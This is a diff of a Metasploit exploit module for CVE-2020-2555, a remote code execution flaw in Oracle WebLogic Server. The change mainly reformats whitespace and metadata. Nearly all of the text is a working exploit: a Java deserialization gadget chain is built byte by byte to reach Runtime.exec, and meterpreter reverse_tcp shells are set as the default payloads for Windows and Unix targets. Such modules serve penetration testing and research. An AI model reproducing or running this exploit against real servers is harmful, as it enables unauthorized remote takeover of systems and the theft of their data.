-          [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
-          [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
+          'Jang', # Vuln Discovery
+          'Y4er', # PoC
+          'Shelby Pace' # Metasploit Module
         ],
-      'Platform'       => %w[ unix linux win ],
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'Targets'        =>
-        [
+        'References' =>
           [
-            'Windows',
-            {
-              'Platform'        => 'win',
-              'Arch'            => [ ARCH_X86, ARCH_X64 ],
-              'DefaultOptions'  => { 'Payload' =>  'windows/meterpreter/reverse_tcp' }
-            }
+            [ 'CVE', '2020-2555' ],
+            [ 'URL', 'https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server' ],
+            [ 'URL', 'https://github.com/Y4er/CVE-2020-2555' ]
           ],
+        'Platform' => %w[unix linux win],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' =>
           [
-            'Unix',
-            {
-              'Platform'        => %w[ unix linux ],
-              'CmdStagerFlavor' => 'printf',
-              'Arch'            => [ ARCH_X86, ARCH_X64 ],
-              'DefaultOptions'  => { 'Payload' =>  'linux/x86/meterpreter/reverse_tcp' }
-            }
+            [
+              'Windows',
+              {
+                'Platform' => 'win',
+                'Arch' => [ ARCH_X86, ARCH_X64 ],
+                'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'Unix',
+              {
+                'Platform' => %w[unix linux],
+                'CmdStagerFlavor' => 'printf',
+                'Arch' => [ ARCH_X86, ARCH_X64 ],
+                'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ],
           ],
-        ],
-      'DisclosureDate' => '2020-01-15',
-      'DefaultTarget'  => 0
-    ))
+        'DisclosureDate' => '2020-01-15',
+        'DefaultTarget' => 0
+      )
+    )
 
     register_options([ Opt::RPORT(7001) ])
 
@@ -77,6 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
     versions = [ Gem::Version.new('12.1.3.0.0'), Gem::Version.new('12.2.1.3.0'), Gem::Version.new('12.2.1.4.0') ]
 
     return CheckCode::Unknown('Failed to obtain response from service') unless res
+
     /WebLogic\s+Server\s+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
     return CheckCode::Unknown('Failed to detect WebLogic') unless version
 
@@ -102,302 +106,302 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def build_payload_obj(payload_data)
-    payload_obj = 'aced'                                  # STREAM_MAGIC
-    payload_obj << '0005'                                 # STREAM_VERSION
-    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    payload_obj << '002e'                                 # Class name length: 46
-    payload_obj << '6a617661782e6d616e61'                 # Class name: javax.management.BadAttributeValueExpException
+    payload_obj = 'aced' # STREAM_MAGIC
+    payload_obj << '0005' # STREAM_VERSION
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '002e' # Class name length: 46
+    payload_obj << '6a617661782e6d616e61' # Class name: javax.management.BadAttributeValueExpException
     payload_obj << '67656d656e742e426164'
     payload_obj << '41747472696275746556'
     payload_obj << '616c7565457870457863'
     payload_obj << '657074696f6e'
-    payload_obj << 'd4e7daab632d4640'                     # SerialVersionUID
-    payload_obj << '020001'                               # Serialization flag, field num = 1
-    payload_obj << '4c0003'                               # Field type code: 4c = Object, field name length: 3
-    payload_obj << '76616c'                               # Field name: val
-    payload_obj << '740012'                               # String, length: 18
+    payload_obj << 'd4e7daab632d4640' # SerialVersionUID
+    payload_obj << '020001' # Serialization flag, field num = 1
+    payload_obj << '4c0003' # Field type code: 4c = Object, field name length: 3
+    payload_obj << '76616c' # Field name: val
+    payload_obj << '740012' # String, length: 18
     payload_obj << '4c6a6176612f6c616e672f4f626a6563743b' # Ljava/lang/Object;
-    payload_obj << '7872'                                 # end block data, TC_CLASSDESC
-    payload_obj << '0013'                                 # Class name length: 19
-    payload_obj << '6a6176612e6c616e672e'                 # java.lang.Exception
+    payload_obj << '7872' # end block data, TC_CLASSDESC
+    payload_obj << '0013' # Class name length: 19
+    payload_obj << '6a6176612e6c616e672e' # java.lang.Exception
     payload_obj << '457863657074696f6e'
-    payload_obj << 'd0fd1f3e1a3b1cc4'                     # SerialVersionUID
-    payload_obj << '020000'                               # Serializable, No fields
-    payload_obj << '7872'                                 # end block data, TC_CLASSDESC
-    payload_obj << '0013'                                 # Class name length: 19
-    payload_obj << '6a6176612e6c616e672e'                 # java.lang.Throwable
+    payload_obj << 'd0fd1f3e1a3b1cc4' # SerialVersionUID
+    payload_obj << '020000' # Serializable, No fields
+    payload_obj << '7872' # end block data, TC_CLASSDESC
+    payload_obj << '0013' # Class name length: 19
+    payload_obj << '6a6176612e6c616e672e' # java.lang.Throwable
     payload_obj << '5468726f7761626c65'
-    payload_obj << 'd5c635273977b8cb'                     # SerialVersionUID
-    payload_obj << '030004'                               # ?, then 4 fields
-    payload_obj << '4c0005'                               # Field type: Object, field name length: 5
-    payload_obj << '6361757365'                           # Field name: cause
-    payload_obj << '740015'                               # String, length: 21
-    payload_obj << '4c6a6176612f6c616e67'                 # Ljava/lang/Throwable;
+    payload_obj << 'd5c635273977b8cb' # SerialVersionUID
+    payload_obj << '030004' # ?, then 4 fields
+    payload_obj << '4c0005' # Field type: Object, field name length: 5
+    payload_obj << '6361757365' # Field name: cause
+    payload_obj << '740015' # String, length: 21
+    payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/Throwable;
     payload_obj << '2f5468726f7761626c653b'
-    payload_obj << '4c000d'                               # Field type: Object, field name length: 13
-    payload_obj << '64657461696c4d657373616765'           # Field name: detailMessage
-    payload_obj << '740012'                               # String, length: 18
-    payload_obj << '4c6a6176612f6c616e67'                 # Ljava/lang/String;
+    payload_obj << '4c000d' # Field type: Object, field name length: 13
+    payload_obj << '64657461696c4d657373616765' # Field name: detailMessage
+    payload_obj << '740012' # String, length: 18
+    payload_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
     payload_obj << '2f537472696e673b'
-    payload_obj << '5b000a'                               # Field type: 5b = array, field name length: 10
-    payload_obj << '737461636b5472616365'                 # Field name: stackTrace
-    payload_obj << '74001e'                               # String, length: 30
-    payload_obj << '5b4c6a6176612f6c616e'                 # [Ljava/lang/StackTraceElement;
+    payload_obj << '5b000a' # Field type: 5b = array, field name length: 10
+    payload_obj << '737461636b5472616365' # Field name: stackTrace
+    payload_obj << '74001e' # String, length: 30
+    payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/StackTraceElement;
     payload_obj << '672f537461636b547261'
     payload_obj << '6365456c656d656e743b'
-    payload_obj << '4c0014'                               # Field type: Object, field name length: 20
-    payload_obj << '73757070726573736564'                 # Field name: suppressedExceptions
+    payload_obj << '4c0014' # Field type: Object, field name length: 20
+    payload_obj << '73757070726573736564' # Field name: suppressedExceptions
     payload_obj << '457863657074696f6e73'
-    payload_obj << '740010'                               # String, length: 16
-    payload_obj << '4c6a6176612f7574696c'                 # Ljava/util/List;
+    payload_obj << '740010' # String, length: 16
+    payload_obj << '4c6a6176612f7574696c' # Ljava/util/List;
     payload_obj << '2f4c6973743b'
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
-    payload_obj << '71'                                   # TC_REFERENCE
-    payload_obj << '007e0008'                             # handle?
-    payload_obj << '7075'                                 # TC_NULL, TC_ARRAY
-    payload_obj << '72001e'                               # TC_CLASSDESC, Class name length: 30
-    payload_obj << '5b4c6a6176612e6c616e'                 # [Ljava.lang.StackTraceElement;
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0008' # handle?
+    payload_obj << '7075' # TC_NULL, TC_ARRAY
+    payload_obj << '72001e' # TC_CLASSDESC, Class name length: 30
+    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.StackTraceElement;
     payload_obj << '672e537461636b547261'
     payload_obj << '6365456c656d656e743b'
-    payload_obj << '02462a3c3cfd2239'                     # SerialVersionUID
-    payload_obj << '020000'                               # Serializable, No fields
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '02462a3c3cfd2239' # SerialVersionUID
+    payload_obj << '020000' # Serializable, No fields
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000001'
-    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    payload_obj << '001b'                                 # Class name length: 27
-    payload_obj << '6a6176612e6c616e672e'                 # java.lang.StackTraceElement
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '001b' # Class name length: 27
+    payload_obj << '6a6176612e6c616e672e' # java.lang.StackTraceElement
     payload_obj << '537461636b5472616365'
     payload_obj << '456c656d656e74'
-    payload_obj << '6109c59a2636dd85'                     # SerialVersionUID
-    payload_obj << '020004'                               # Serializable, 4 fields
-    payload_obj << '49000a'                               # Field type: 49 = Integer, field name length: 10
-    payload_obj << '6c696e654e756d626572'                 # lineNumber
-    payload_obj << '4c000e'                               # Field type: Object, field name length: 14
+    payload_obj << '6109c59a2636dd85' # SerialVersionUID
+    payload_obj << '020004' # Serializable, 4 fields
+    payload_obj << '49000a' # Field type: 49 = Integer, field name length: 10
+    payload_obj << '6c696e654e756d626572' # lineNumber
+    payload_obj << '4c000e' # Field type: Object, field name length: 14
     payload_obj << '6465636c6172696e6743'
-    payload_obj << '6c617373'                             # declaringClass
-    payload_obj << '71'                                   # TC_REFERENCE
-    payload_obj << '007e0005'                             # handle
-    payload_obj << '4c0008'                               # Field type: Object, field name length: 8
-    payload_obj << '66696c654e616d65'                     # fileName
-    payload_obj << '71'                                   # TC_REFERENCE
-    payload_obj << '007e0005'                             # handle
-    payload_obj << '4c000a'                               # Field type: Object, field name length: 10
-    payload_obj << '6d6574686f644e616d65'                 # methodName
-    payload_obj << '71'                                   # TC_REFERENCE
-    payload_obj << '007e0005'                             # handle
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '6c617373' # declaringClass
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0005' # handle
+    payload_obj << '4c0008' # Field type: Object, field name length: 8
+    payload_obj << '66696c654e616d65' # fileName
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0005' # handle
+    payload_obj << '4c000a' # Field type: Object, field name length: 10
+    payload_obj << '6d6574686f644e616d65' # methodName
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0005' # handle
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000028'
-    payload_obj << '74000d'                               # String, length: 13
-    payload_obj << '5765626c6f6769635f32353535'           # Weblogic_2555 -> PoC class name -> randomize?
-    payload_obj << '740012'                               # String, length: 18
-    payload_obj << '5765626c6f6769635f32'                 # Weblogic_2555.java
+    payload_obj << '74000d' # String, length: 13
+    payload_obj << '5765626c6f6769635f32353535' # Weblogic_2555 -> PoC class name -> randomize?
+    payload_obj << '740012' # String, length: 18
+    payload_obj << '5765626c6f6769635f32' # Weblogic_2555.java
     payload_obj << '3535352e6a617661'
-    payload_obj << '740004'                               # String, length: 4
-    payload_obj << '6d61696e'                             # main
-    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    payload_obj << '0026'                                 # Class name length: 38
-    payload_obj << '6a6176612e7574696c2e'                 # java.util.Collections$UnmodifiableList
+    payload_obj << '740004' # String, length: 4
+    payload_obj << '6d61696e' # main
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '0026' # Class name length: 38
+    payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableList
     payload_obj << '436f6c6c656374696f6e'
     payload_obj << '7324556e6d6f64696669'
     payload_obj << '61626c654c697374'
-    payload_obj << 'fc0f2531b5ec8e10'                     # SerialVersionUID
-    payload_obj << '020001'                               # Serializable, 1 field
-    payload_obj << '4c0004'                               # Field type: Object, field name length: 4
-    payload_obj << '6c697374'                             # list
-    payload_obj << '71'                                   # TC_REFERENCE
-    payload_obj << '007e0007'                             # handle
-    payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
-    payload_obj << '002c'                                 # Class name length: 44
-    payload_obj << '6a6176612e7574696c2e'                 # java.util.Collections$UnmodifiableCollection
+    payload_obj << 'fc0f2531b5ec8e10' # SerialVersionUID
+    payload_obj << '020001' # Serializable, 1 field
+    payload_obj << '4c0004' # Field type: Object, field name length: 4
+    payload_obj << '6c697374' # list
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0007' # handle
+    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    payload_obj << '002c' # Class name length: 44
+    payload_obj << '6a6176612e7574696c2e' # java.util.Collections$UnmodifiableCollection
     payload_obj << '436f6c6c656374696f6e'
     payload_obj << '7324556e6d6f64696669'
     payload_obj << '61626c65436f6c6c6563'
     payload_obj << '74696f6e'
-    payload_obj << '19420080cb5ef71e'                     # SerialVersionUID
-    payload_obj << '020001'                               # Serializable, 1 field
-    payload_obj << '4c0001'                               # Field type: Object, field name length: 1
-    payload_obj << '63'                                   # Field name: c
-    payload_obj << '740016'                               # String, length: 22
-    payload_obj << '4c6a6176612f7574696c'                 # Ljava/util/Collection;
+    payload_obj << '19420080cb5ef71e' # SerialVersionUID
+    payload_obj << '020001' # Serializable, 1 field
+    payload_obj << '4c0001' # Field type: Object, field name length: 1
+    payload_obj << '63' # Field name: c
+    payload_obj << '740016' # String, length: 22
+    payload_obj << '4c6a6176612f7574696c' # Ljava/util/Collection;
     payload_obj << '2f436f6c6c656374696f'
     payload_obj << '6e3b'
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
-    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    payload_obj << '0013'                                 # Class name length: 19
-    payload_obj << '6a6176612e7574696c2e'                 # java.util.ArrayList
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '0013' # Class name length: 19
+    payload_obj << '6a6176612e7574696c2e' # java.util.ArrayList
     payload_obj << '41727261794c697374'
-    payload_obj << '7881d21d99c7619d'                     # SerialVersionUID
-    payload_obj << '030001'                               # ?, 1 field
-    payload_obj << '490004'                               # Field type: Integer, field name length: 4
-    payload_obj << '73697a65'                             # size
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '7881d21d99c7619d' # SerialVersionUID
+    payload_obj << '030001' # ?, 1 field
+    payload_obj << '490004' # Field type: Integer, field name length: 4
+    payload_obj << '73697a65' # size
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000000'
-    payload_obj << '7704'                                 # TC_BLOCKDATA, length: 4
+    payload_obj << '7704' # TC_BLOCKDATA, length: 4
     payload_obj << '00000000'
-    payload_obj << '7871'                                 # TC_ENDBLOCKDATA, TC_REFERENCE
-    payload_obj << '007e0015'                             # handle
-    payload_obj << '78'                                   # TC_ENDBLOCKDATA
-    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    payload_obj << '0024'                                 # Class name length: 36
-    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.filter.LimitFilter
+    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
+    payload_obj << '007e0015' # handle
+    payload_obj << '78' # TC_ENDBLOCKDATA
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '0024' # Class name length: 36
+    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.filter.LimitFilter
     payload_obj << '6f6c2e7574696c2e6669'
     payload_obj << '6c7465722e4c696d6974'
     payload_obj << '46696c746572'
-    payload_obj << limit_filter_uid                       # SerialVersionUID
-    payload_obj << '020006'                               # Serializable, 6 fields
-    payload_obj << '49000b'                               # Field type: Integer, field name length: 11
-    payload_obj << '6d5f635061676553697a65'               # m_cPageSize
-    payload_obj << '490007'                               # Field type: Integer, field name length: 7
-    payload_obj << '6d5f6e50616765'                       # m_nPage
-    payload_obj << '4c000c'                               # Field type: Object, field name length: 12
-    payload_obj << '6d5f636f6d70617261746f72'             # m_comparator
-    payload_obj << '740016'                               # String, length: 22
-    payload_obj << '4c6a6176612f7574696c'                 # Ljava/util/Comparator;
+    payload_obj << limit_filter_uid # SerialVersionUID
+    payload_obj << '020006' # Serializable, 6 fields
+    payload_obj << '49000b' # Field type: Integer, field name length: 11
+    payload_obj << '6d5f635061676553697a65' # m_cPageSize
+    payload_obj << '490007' # Field type: Integer, field name length: 7
+    payload_obj << '6d5f6e50616765' # m_nPage
+    payload_obj << '4c000c' # Field type: Object, field name length: 12
+    payload_obj << '6d5f636f6d70617261746f72' # m_comparator
+    payload_obj << '740016' # String, length: 22
+    payload_obj << '4c6a6176612f7574696c' # Ljava/util/Comparator;
     payload_obj << '2f436f6d70617261746f'
     payload_obj << '723b'
-    payload_obj << '4c0008'                               # Field type: Object, field name length: 8
-    payload_obj << '6d5f66696c746572'                     # m_filter
-    payload_obj << '74001a'                               # String, length: 26
-    payload_obj << '4c636f6d2f74616e676f'                 # Lcom/tangosol/util/Filter;
+    payload_obj << '4c0008' # Field type: Object, field name length: 8
+    payload_obj << '6d5f66696c746572' # m_filter
+    payload_obj << '74001a' # String, length: 26
+    payload_obj << '4c636f6d2f74616e676f' # Lcom/tangosol/util/Filter;
     payload_obj << '736f6c2f7574696c2f46'
     payload_obj << '696c7465723b'
-    payload_obj << '4c000f'                               # Field type: Object, field name length: 15
-    payload_obj << '6d5f6f416e63686f7242'                 # m_oAnchorBottom
+    payload_obj << '4c000f' # Field type: Object, field name length: 15
+    payload_obj << '6d5f6f416e63686f7242' # m_oAnchorBottom
     payload_obj << '6f74746f6d'
-    payload_obj << '71'                                   # TC_REFERENCE
-    payload_obj << '007e0001'                             # handle
-    payload_obj << '4c000c'                               # Field type: Object, field name length: 12
-    payload_obj << '6d5f6f416e63686f72546f70'             # m_oAnchorTop
-    payload_obj << '71'                                   # TC_REFERENCE
-    payload_obj << '007e0001'                             # handle
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0001' # handle
+    payload_obj << '4c000c' # Field type: Object, field name length: 12
+    payload_obj << '6d5f6f416e63686f72546f70' # m_oAnchorTop
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0001' # handle
 
     unless @version_no == Gem::Version.new('12.1.3.0.0')
       payload_obj << add_class_desc
     end
 
-    payload_obj << '7870'                                  # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000000'
     payload_obj << '00000000'
-    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    payload_obj << '002c'                                 # Class name length: 44
-    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.extractor.ChainedExtractor
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '002c' # Class name length: 44
+    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ChainedExtractor
     payload_obj << '6f6c2e7574696c2e6578'
     payload_obj << '74726163746f722e4368'
     payload_obj << '61696e65644578747261'
     payload_obj << '63746f72'
-    payload_obj << chained_extractor_uid                  # SerialVersionUID
-    payload_obj << '020000'                               # Serializable, no fields
-    payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
-    payload_obj << '0036'                                 # Class name length: 54
-    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.extractor.AbstractCompositeExtractor
+    payload_obj << chained_extractor_uid # SerialVersionUID
+    payload_obj << '020000' # Serializable, no fields
+    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    payload_obj << '0036' # Class name length: 54
+    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractCompositeExtractor
     payload_obj << '6f6c2e7574696c2e6578'
     payload_obj << '74726163746f722e4162'
     payload_obj << '737472616374436f6d70'
     payload_obj << '6f736974654578747261'
     payload_obj << '63746f72'
-    payload_obj << '086b3d8c05690f44'                     # SerialVersionUID
-    payload_obj << '020001'                               # Serializable, 1 field
-    payload_obj << '5b000c'                               # Field type: Array, field name length: 12
-    payload_obj << '6d5f61457874726163746f72'             # m_aExtractor
-    payload_obj << '740023'                               # String, length: 35
-    payload_obj << '5b4c636f6d2f74616e67'                 # [Lcom/tangosol/util/ValueExtractor;
+    payload_obj << '086b3d8c05690f44' # SerialVersionUID
+    payload_obj << '020001' # Serializable, 1 field
+    payload_obj << '5b000c' # Field type: Array, field name length: 12
+    payload_obj << '6d5f61457874726163746f72' # m_aExtractor
+    payload_obj << '740023' # String, length: 35
+    payload_obj << '5b4c636f6d2f74616e67' # [Lcom/tangosol/util/ValueExtractor;
     payload_obj << '6f736f6c2f7574696c2f'
     payload_obj << '56616c75654578747261'
     payload_obj << '63746f723b'
-    payload_obj << '7872'                                 # TC_ENDBLOCKDATA, TC_CLASSDESC
-    payload_obj << '002d'                                 # Class name length: 45
-    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.extractor.AbstractExtractor
+    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
+    payload_obj << '002d' # Class name length: 45
+    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.AbstractExtractor
     payload_obj << '6f6c2e7574696c2e6578'
     payload_obj << '74726163746f722e4162'
     payload_obj << '73747261637445787472'
     payload_obj << '6163746f72'
-    payload_obj << abstract_extractor_uid                 # SerialVersionUID
-    payload_obj << '020001'                               # Serializable, 1 field
-    payload_obj << '490009'                               # Field type: Integer, field name length: 9
-    payload_obj << '6d5f6e546172676574'                   # m_nTarget
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << abstract_extractor_uid # SerialVersionUID
+    payload_obj << '020001' # Serializable, 1 field
+    payload_obj << '490009' # Field type: Integer, field name length: 9
+    payload_obj << '6d5f6e546172676574' # m_nTarget
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000000'
-    payload_obj << '7572'                                 # TC_ARRAY, TC_CLASSDESC
-    payload_obj << '0032'                                 # Class name length: 50
-    payload_obj << '5b4c636f6d2e74616e67'                 # [Lcom.tangosol.util.extractor.ReflectionExtractor;
+    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0032' # Class name length: 50
+    payload_obj << '5b4c636f6d2e74616e67' # [Lcom.tangosol.util.extractor.ReflectionExtractor;
     payload_obj << '6f736f6c2e7574696c2e'
     payload_obj << '657874726163746f722e'
     payload_obj << '5265666c656374696f6e'
     payload_obj << '457874726163746f723b'
-    payload_obj << 'dd8b89aed70273ca'                     # SerialVersionUID
-    payload_obj << '020000'                               # Serializable, no fields
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << 'dd8b89aed70273ca' # SerialVersionUID
+    payload_obj << '020000' # Serializable, no fields
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000003'
-    payload_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
-    payload_obj << '002f'                                 # Class name length: 47
-    payload_obj << '636f6d2e74616e676f73'                 # com.tangosol.util.extractor.ReflectionExtractor
+    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
+    payload_obj << '002f' # Class name length: 47
+    payload_obj << '636f6d2e74616e676f73' # com.tangosol.util.extractor.ReflectionExtractor
     payload_obj << '6f6c2e7574696c2e6578'
     payload_obj << '74726163746f722e5265'
     payload_obj << '666c656374696f6e4578'
     payload_obj << '74726163746f72'
-    payload_obj << reflection_extractor_uid               # SerialVersionUID
-    payload_obj << '02000'                                # Serializable, variable fields orig: 020002
+    payload_obj << reflection_extractor_uid # SerialVersionUID
+    payload_obj << '02000' # Serializable, variable fields orig: 020002
     payload_obj << reflect_extract_count
-    payload_obj << '5b0009'                               # Field type: Array, field name length: 9
-    payload_obj << '6d5f616f506172616d'                   # m_aoParam
-    payload_obj << '740013'                               # String, length: 19
-    payload_obj << '5b4c6a6176612f6c616e'                 # [Ljava/lang/Object;
+    payload_obj << '5b0009' # Field type: Array, field name length: 9
+    payload_obj << '6d5f616f506172616d' # m_aoParam
+    payload_obj << '740013' # String, length: 19
+    payload_obj << '5b4c6a6176612f6c616e' # [Ljava/lang/Object;
     payload_obj << '672f4f626a6563743b'
     payload_obj << add_sect
-    payload_obj << '4c0009'                               # Object, length: 9
-    payload_obj << '6d5f734d6574686f64'                   # m_sMethod
-    payload_obj << '71'                                   # TC_REFERENCE
-    payload_obj << '007e0005'                             # handle
-    payload_obj << '7871'                                 # TC_ENDBLOCKDATA, TC_REFERENCE
+    payload_obj << '4c0009' # Object, length: 9
+    payload_obj << '6d5f734d6574686f64' # m_sMethod
+    payload_obj << '71' # TC_REFERENCE
+    payload_obj << '007e0005' # handle
+    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
     payload_obj << (change_handle? ? '007e001d' : '007e001e')
     payload_obj << '00000000'
-    payload_obj << '7572'                                 # TC_ARRAY, TC_CLASSDESC
-    payload_obj << '0013'                                 # Class name length: 19
-    payload_obj << '5b4c6a6176612e6c616e'                 # [Ljava.lang.Object;
+    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0013' # Class name length: 19
+    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Object;
     payload_obj << '672e4f626a6563743b'
-    payload_obj << '90ce589f1073296c'                     # SerialVersionUID
-    payload_obj << '020000'                               # Serializable, no fields
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << '90ce589f1073296c' # SerialVersionUID
+    payload_obj << '020000' # Serializable, no fields
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000002'
-    payload_obj << '74000a'                               # String, length: 10
-    payload_obj << '67657452756e74696d65'                 # getRuntime
-    payload_obj << '7572'                                 # TC_ARRAY, TC_CLASSDESC
-    payload_obj << '0012'                                 # Class name length: 18
-    payload_obj << '5b4c6a6176612e6c616e'                 # [Ljava.lang.Class;
+    payload_obj << '74000a' # String, length: 10
+    payload_obj << '67657452756e74696d65' # getRuntime
+    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0012' # Class name length: 18
+    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.Class;
     payload_obj << '672e436c6173733b'
-    payload_obj << 'ab16d7aecbcd5a99'                     # SerialVersionUID
-    payload_obj << '020000'                               # Serializable, no fields
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID
+    payload_obj << '020000' # Serializable, no fields
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000000'
     payload_obj << add_tc_null
-    payload_obj << '740009'                               # String, length: 9
-    payload_obj << '6765744d6574686f64'                   # getMethod
-    payload_obj << '7371'                                 # TC_OBJECT, TC_REFERENCE
+    payload_obj << '740009' # String, length: 9
+    payload_obj << '6765744d6574686f64' # getMethod
+    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
     payload_obj << (change_handle? ? '007e0021' : '007e0022')
     payload_obj << '00000000'
-    payload_obj << '7571'                                 # TC_ARRAY, TC_REFERENCE
+    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
     payload_obj << (change_handle? ? '007e0024' : '007e0025')
-    payload_obj << '00000002'                             # array size: 2
-    payload_obj << '7075'                                 # TC_NULL, TC_ARRAY
-    payload_obj << '71'                                   # TC_REFERENCE
+    payload_obj << '00000002' # array size: 2
+    payload_obj << '7075' # TC_NULL, TC_ARRAY
+    payload_obj << '71' # TC_REFERENCE
     payload_obj << (change_handle? ? '007e0024' : '007e0025')
     payload_obj << '00000000'
     payload_obj << add_tc_null
-    payload_obj << '740006'                               # TC_STRING, length: 6
-    payload_obj << '696e766f6b65'                         # invoke
-    payload_obj << '7371'                                 # TC_OBJECT, TC_REFERENCE
+    payload_obj << '740006' # TC_STRING, length: 6
+    payload_obj << '696e766f6b65' # invoke
+    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
     payload_obj << (change_handle? ? '007e0021' : '007e0022')
     payload_obj << '00000000'
-    payload_obj << '7571'                                 # TC_ARRAY, TC_REFERENCE
+    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
     payload_obj << (change_handle? ? '007e0024' : '007e0025')
     payload_obj << '00000001'
-    payload_obj << '7572'                                 # TC_ARRAY, TC_CLASSDESC
-    payload_obj << '0013'                                 # Class name length: 19
-    payload_obj << '5b4c6a6176612e6c616e'                 # [Ljava.lang.String;
+    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
+    payload_obj << '0013' # Class name length: 19
+    payload_obj << '5b4c6a6176612e6c616e' # [Ljava.lang.String;
     payload_obj << '672e537472696e673b'
-    payload_obj << 'add256e7e91d7b47'                     # SerialVersionUID
-    payload_obj << '020000'                               # Serializable, no fields
-    payload_obj << '7870'                                 # TC_ENDBLOCKDATA, TC_NULL
+    payload_obj << 'add256e7e91d7b47' # SerialVersionUID
+    payload_obj << '020000' # Serializable, no fields
+    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
     payload_obj << '00000003'
 
     payload_bin = format_payload(payload_data)
